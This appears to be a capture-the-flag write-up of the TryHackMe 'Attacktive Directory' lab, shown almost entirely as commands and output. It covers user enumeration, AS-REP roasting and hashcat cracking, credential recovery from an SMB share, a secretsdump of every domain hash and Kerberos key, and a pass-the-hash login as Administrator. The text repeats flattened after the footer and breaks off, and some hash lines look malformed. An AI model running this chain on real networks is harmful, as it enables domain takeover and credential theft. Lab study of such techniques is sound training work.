Attacktive Directory

sudo python3 ~/tools/enum4linux-ng/enum4linux-ng.py -A 10.10.113.122                      
ENUM4LINUX - next generation

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.10.113.122
[*] Username ......... ''
[*] Random Username .. 'fvqodhau'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 =====================================
|    Service Scan on 10.10.113.122    |
 =====================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 =====================================================
|    Domain Information via LDAP for 10.10.113.122    |
 =====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: spookysec.local

 =====================================================
|    NetBIOS Names and Workgroup for 10.10.113.122    |
 =====================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out

 ==========================================
|    SMB Dialect Check on 10.10.113.122    |
 ==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
SMB 1.0: false                                                                                                              
SMB 2.02: true                                                                                                              
SMB 2.1: true                                                                                                               
SMB 3.0: true                                                                                                               
SMB1 only: false                                                                                                            
Preferred dialect: SMB 3.0                                                                                                  
SMB signing required: true                                                                                                  

 ==========================================
|    RPC Session Check on 10.10.113.122    |
 ==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user session
[-] Could not establish random user session: STATUS_LOGON_FAILURE

 ====================================================
|    Domain Information via RPC for 10.10.113.122    |
 ====================================================
[+] Domain: THM-AD
[+] SID: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)

 ============================================================
|    Domain Information via SMB session for 10.10.113.122    |
 ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: ATTACKTIVEDIREC                                                                                      
NetBIOS domain name: THM-AD                                                                                                 
DNS domain: spookysec.local                                                                                                 
FQDN: AttacktiveDirectory.spookysec.local                                                                                   

 ================================================
|    OS Information via RPC for 10.10.113.122    |
 ================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016                                                                    
OS version: '10.0'                                                                                                          
OS release: '1809'                                                                                                          
OS build: '17763'                                                                                                           
Native OS: not supported                                                                                                    
Native LAN manager: not supported                                                                                           
Platform id: null                                                                                                           
Server type: null                                                                                                           
Server type string: null                                                                                                    

 ======================================
|    Users via RPC on 10.10.113.122    |
 ======================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED

 =======================================
|    Groups via RPC on 10.10.113.122    |
 =======================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED

 =======================================
|    Shares via RPC on 10.10.113.122    |
 =======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user

 ==========================================
|    Policies via RPC for 10.10.113.122    |
 ==========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed

 ==========================================
|    Printers via RPC for 10.10.113.122    |
 ==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED

Completed after 24.92 seconds

sudo nmap -T5 -Pn 10.10.113.122                                     
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-30 14:08 EST
Warning: 10.10.113.122 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.113.122
Host is up (0.13s latency).
Not shown: 987 closed tcp ports (reset)
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 7.80 seconds

~/tools/kerbrute userenum --dc 10.10.113.122 -d THM-AD userlist.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/30/21 - Ronnie Flathers @ropnop

2021/12/30 14:15:15 >  Using KDC(s):
2021/12/30 14:15:15 >   10.10.113.122:88

2021/12/30 14:15:16 >  [+] VALID USERNAME:       james@THM-AD
2021/12/30 14:15:18 >  [+] VALID USERNAME:       svc-admin@THM-AD
2021/12/30 14:15:21 >  [+] VALID USERNAME:       James@THM-AD
2021/12/30 14:15:22 >  [+] VALID USERNAME:       robin@THM-AD
2021/12/30 14:15:33 >  [+] VALID USERNAME:       darkstar@THM-AD
2021/12/30 14:15:40 >  [+] VALID USERNAME:       administrator@THM-AD
2021/12/30 14:15:54 >  [+] VALID USERNAME:       backup@THM-AD
2021/12/30 14:16:01 >  [+] VALID USERNAME:       paradox@THM-AD
2021/12/30 14:16:46 >  [+] VALID USERNAME:       JAMES@THM-AD
2021/12/30 14:17:02 >  [+] VALID USERNAME:       Robin@THM-AD
2021/12/30 14:18:34 >  [+] VALID USERNAME:       Administrator@THM-AD
2021/12/30 14:21:32 >  [+] VALID USERNAME:       Darkstar@THM-AD
2021/12/30 14:22:30 >  [+] VALID USERNAME:       Paradox@THM-AD
2021/12/30 14:25:46 >  [+] VALID USERNAME:       DARKSTAR@THM-AD
2021/12/30 14:26:43 >  [+] VALID USERNAME:       ori@THM-AD
2021/12/30 14:28:27 >  [+] VALID USERNAME:       ROBIN@THM-AD
2021/12/30 14:32:45 >  Done! Tested 73317 usernames (16 valid) in 1049.395 seconds

impacket-GetNPUsers THM-AD/ -usersfile valid_users.txt -format hashcat -outputfile npusers.hashcat
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JAMES doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARKSTAR doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ori doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ROBIN doesn't have UF_DONT_REQUIRE_PREAUTH set

cat npusers.hashcat                                                                               
$krb5asrep$23$svc-admin@THM-AD:6c4b5c587e1486e85fae515d595277df$5ef7185503df999a7262b798d7908b42ee9cb2ec070423bb2a6397c2029cc73435bc6733a0e13c953f9e37f2bb50aa6b2d157e08661cf2a14570333d4b647933864c7cf9e630a87c354ae54e734efcba59398a57a40c8d79d20e3839ea10fa3d65648beb5934bc9e802541fdecbd35a1616edd671c4cb99051d0e6133c129a2e54ab580ec1f941f65e00c81091078f533e5d152a009352cbcc5b423aedc4d89ae86750f50b727b41e61c0053bba6fe1541acfd485fe739ddab8002c4a5a45237d61d02be73d41e1bc3c9ff727512d870d8d04b3528e716b5233978b31a809fdd5de102f43575daa451

hashcat -m 18200 -a 0 npusers.hashcat passwordlist.txt                                            
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz, 13895/13959 MB (4096 MB allocatable), 6MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 169 MB

Dictionary cache hit:
* Filename..: passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188

$krb5asrep$23$svc-admin@THM-AD:6c4b5c587e1486e85fae515d595277df$5ef7185503df999a7262b798d7908b42ee9cb2ec070423bb2a6397c2029cc73435bc6733a0e13c953f9e37f2bb50aa6b2d157e08661cf2a14570333d4b647933864c7cf9e630a87c354ae54e734efcba59398a57a40c8d79d20e3839ea10fa3d65648beb5934bc9e802541fdecbd35a1616edd671c4cb99051d0e6133c129a2e54ab580ec1f941f65e00c81091078f533e5d152a009352cbcc5b423aedc4d89ae86750f50b727b41e61c0053bba6fe1541acfd485fe739ddab8002c4a5a45237d61d02be73d41e1bc3c9ff727512d870d8d04b3528e716b5233978b31a809fdd5de102f43575daa451:management2005
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$svc-admin@THM-AD:6c4b5c587e1486e85fae...daa451
Time.Started.....: Thu Dec 30 15:20:45 2021 (0 secs)
Time.Estimated...: Thu Dec 30 15:20:45 2021 (0 secs)
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1764.8 kH/s (5.36ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 12288/70188 (17.51%)
Rejected.........: 0/12288 (0.00%)
Restore.Point....: 0/70188 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m123456 -> henrik

Started: Thu Dec 30 15:20:44 2021
Stopped: Thu Dec 30 15:20:47 2021

smbclient -L 10.10.113.122 -U 'svc-admin' -p 
Enter WORKGROUP\svc-admin's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.113.122 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

smbclient //10.10.113.122/backup -U 'svc-admin' -p                                                                130 ⨯
Enter WORKGROUP\svc-admin's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

                8247551 blocks of size 4096. 3636099 blocks available
smb: \> get backup_credentials.txt 
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
                                                                                                                            
┌──(kali㉿kali)-[~/THM/Attacktive-Directory]
└─$ cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

echo 'YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw' | base64 -d                                               130 ⨯
backup@spookysec.local:backup2517860

impacket-secretsdump -just-dc THM-AD/backup:backup2517860@10.10.113.122 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad19741bde08e135f4b40f1ca9aab455383b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404eeaad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538::::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:162d12304960732d9439d2af8e14d1bd:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:d04691edc1c844600ded082e1e79e00fdc8bff2604811122ed676035de026430
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:a2d8605f33eb85e2463b34a2af3ff994
ATTACKTIVEDIREC$:des-cbc-md5:8afda8c1c7348c58
[*] Cleaning up...

evil-winrm -i 10.10.199.242 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

PreviousTry Hack Me NextOSCP Practice

Last updated 3 years ago

sudo python3 ~/tools/enum4linux-ng/enum4linux-ng.py -A 10.10.113.122 ENUM4LINUX - next generation ========================== | Target Information | ========================== [*] Target ........... 10.10.113.122 [*] Username ......... '' [*] Random Username .. 'fvqodhau' [*] Password ......... '' [*] Timeout .......... 5 second(s) ===================================== | Service Scan on 10.10.113.122 | ===================================== [*] Checking LDAP [+] LDAP is accessible on 389/tcp [*] Checking LDAPS [+] LDAPS is accessible on 636/tcp [*] Checking SMB [+] SMB is accessible on 445/tcp [*] Checking SMB over NetBIOS [+] SMB over NetBIOS is accessible on 139/tcp ===================================================== | Domain Information via LDAP for 10.10.113.122 | ===================================================== [*] Trying LDAP [+] Appears to be root/parent DC [+] Long domain name is: spookysec.local ===================================================== | NetBIOS Names and Workgroup for 10.10.113.122 | ===================================================== [-] Could not get NetBIOS names information via 'nmblookup': timed out ========================================== | SMB Dialect Check on 10.10.113.122 | ========================================== [*] Trying on 445/tcp [+] Supported dialects and settings: SMB 1.0: false SMB 2.02: true SMB 2.1: true SMB 3.0: true SMB1 only: false Preferred dialect: SMB 3.0 SMB signing required: true ========================================== | RPC Session Check on 10.10.113.122 | ========================================== [*] Check for null session [+] Server allows session using username '', password '' [*] Check for random user session [-] Could not establish random user session: STATUS_LOGON_FAILURE ==================================================== | Domain Information via RPC for 10.10.113.122 | ==================================================== [+] Domain: THM-AD [+] SID: S-1-5-21-3591857110-2884097990-301047963 [+] Host is part of a domain (not a workgroup) ============================================================ | Domain Information via SMB session for 10.10.113.122 | ============================================================ [*] Enumerating via unauthenticated SMB session on 445/tcp [+] Found domain information via SMB NetBIOS computer name: ATTACKTIVEDIREC NetBIOS domain name: THM-AD DNS domain: spookysec.local FQDN: AttacktiveDirectory.spookysec.local ================================================ | OS Information via RPC for 10.10.113.122 | ================================================ [*] Enumerating via unauthenticated SMB session on 445/tcp [+] Found OS information via SMB [*] Enumerating via 'srvinfo' [-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED [+] After merging OS information we have the following result: OS: Windows 10, Windows Server 2019, Windows Server 2016 OS version: '10.0' OS release: '1809' OS build: '17763' Native OS: not supported Native LAN manager: not supported Platform id: null Server type: null Server type string: null ====================================== | Users via RPC on 10.10.113.122 | ====================================== [*] Enumerating users via 'querydispinfo' [-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED [*] Enumerating users via 'enumdomusers' [-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED ======================================= | Groups via RPC on 10.10.113.122 | ======================================= [*] Enumerating local groups [-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED [*] Enumerating builtin groups [-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED [*] Enumerating domain groups [-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED ======================================= | Shares via RPC on 10.10.113.122 | ======================================= [*] Enumerating shares [+] Found 0 share(s) for user '' with password '', try a different user ========================================== | Policies via RPC for 10.10.113.122 | ========================================== [*] Trying port 445/tcp [-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED [*] Trying port 139/tcp [-] SMB connection error on port 139/tcp: session failed ========================================== | Printers via RPC for 10.10.113.122 | ========================================== [-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED Completed after 24.92 seconds

sudo nmap -T5 -Pn 10.10.113.122 Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-30 14:08 EST Warning: 10.10.113.122 giving up on port because retransmission cap hit (2). Nmap scan report for 10.10.113.122 Host is up (0.13s latency). Not shown: 987 closed tcp ports (reset) PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server Nmap done: 1 IP address (1 host up) scanned in 7.80 seconds

~/tools/kerbrute userenum --dc 10.10.113.122 -d THM-AD userlist.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 12/30/21 - Ronnie Flathers @ropnop 2021/12/30 14:15:15 > Using KDC(s): 2021/12/30 14:15:15 > 10.10.113.122:88 2021/12/30 14:15:16 > [+] VALID USERNAME: james@THM-AD 2021/12/30 14:15:18 > [+] VALID USERNAME: svc-admin@THM-AD 2021/12/30 14:15:21 > [+] VALID USERNAME: James@THM-AD 2021/12/30 14:15:22 > [+] VALID USERNAME: robin@THM-AD 2021/12/30 14:15:33 > [+] VALID USERNAME: darkstar@THM-AD 2021/12/30 14:15:40 > [+] VALID USERNAME: administrator@THM-AD 2021/12/30 14:15:54 > [+] VALID USERNAME: backup@THM-AD 2021/12/30 14:16:01 > [+] VALID USERNAME: paradox@THM-AD 2021/12/30 14:16:46 > [+] VALID USERNAME: JAMES@THM-AD 2021/12/30 14:17:02 > [+] VALID USERNAME: Robin@THM-AD 2021/12/30 14:18:34 > [+] VALID USERNAME: Administrator@THM-AD 2021/12/30 14:21:32 > [+] VALID USERNAME: Darkstar@THM-AD 2021/12/30 14:22:30 > [+] VALID USERNAME: Paradox@THM-AD 2021/12/30 14:25:46 > [+] VALID USERNAME: DARKSTAR@THM-AD 2021/12/30 14:26:43 > [+] VALID USERNAME: ori@THM-AD 2021/12/30 14:28:27 > [+] VALID USERNAME: ROBIN@THM-AD 2021/12/30 14:32:45 > Done! Tested 73317 usernames (16 valid) in 1049.395 seconds

impacket-GetNPUsers THM-AD/ -usersfile valid_users.txt -format hashcat -outputfile npusers.hashcat Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation [-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User JAMES doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Robin doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Paradox doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User DARKSTAR doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User ori doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User ROBIN doesn't have UF_DONT_REQUIRE_PREAUTH set

cat npusers.hashcat $krb5asrep$23$svc-admin@THM-AD:6c4b5c587e1486e85fae515d595277df$5ef7185503df999a7262b798d7908b42ee9cb2ec070423bb2a6397c2029cc73435bc6733a0e13c953f9e37f2bb50aa6b2d157e08661cf2a14570333d4b647933864c7cf9e630a87c354ae54e734efcba59398a57a40c8d79d20e3839ea10fa3d65648beb5934bc9e802541fdecbd35a1616edd671c4cb99051d0e6133c129a2e54ab580ec1f941f65e00c81091078f533e5d152a009352cbcc5b423aedc4d89ae86750f50b727b41e61c0053bba6fe1541acfd485fe739ddab8002c4a5a45237d61d02be73d41e1bc3c9ff727512d870d8d04b3528e716b5233978b31a809fdd5de102f43575daa451

hashcat -m 18200 -a 0 npusers.hashcat passwordlist.txt hashcat (v6.1.1) starting... OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ===================================================================================================================================== * Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz, 13895/13959 MB (4096 MB allocatable), 6MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers applied: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance. If you want to switch to optimized backend kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Host memory required for this attack: 169 MB Dictionary cache hit: * Filename..: passwordlist.txt * Passwords.: 70188 * Bytes.....: 569236 * Keyspace..: 70188 $krb5asrep$23$svc-admin@THM-AD:6c4b5c587e1486e85fae515d595277df$5ef7185503df999a7262b798d7908b42ee9cb2ec070423bb2a6397c2029cc73435bc6733a0e13c953f9e37f2bb50aa6b2d157e08661cf2a14570333d4b647933864c7cf9e630a87c354ae54e734efcba59398a57a40c8d79d20e3839ea10fa3d65648beb5934bc9e802541fdecbd35a1616edd671c4cb99051d0e6133c129a2e54ab580ec1f941f65e00c81091078f533e5d152a009352cbcc5b423aedc4d89ae86750f50b727b41e61c0053bba6fe1541acfd485fe739ddab8002c4a5a45237d61d02be73d41e1bc3c9ff727512d870d8d04b3528e716b5233978b31a809fdd5de102f43575daa451:management2005 Session..........: hashcat Status...........: Cracked Hash.Name........: Kerberos 5, etype 23, AS-REP Hash.Target......: 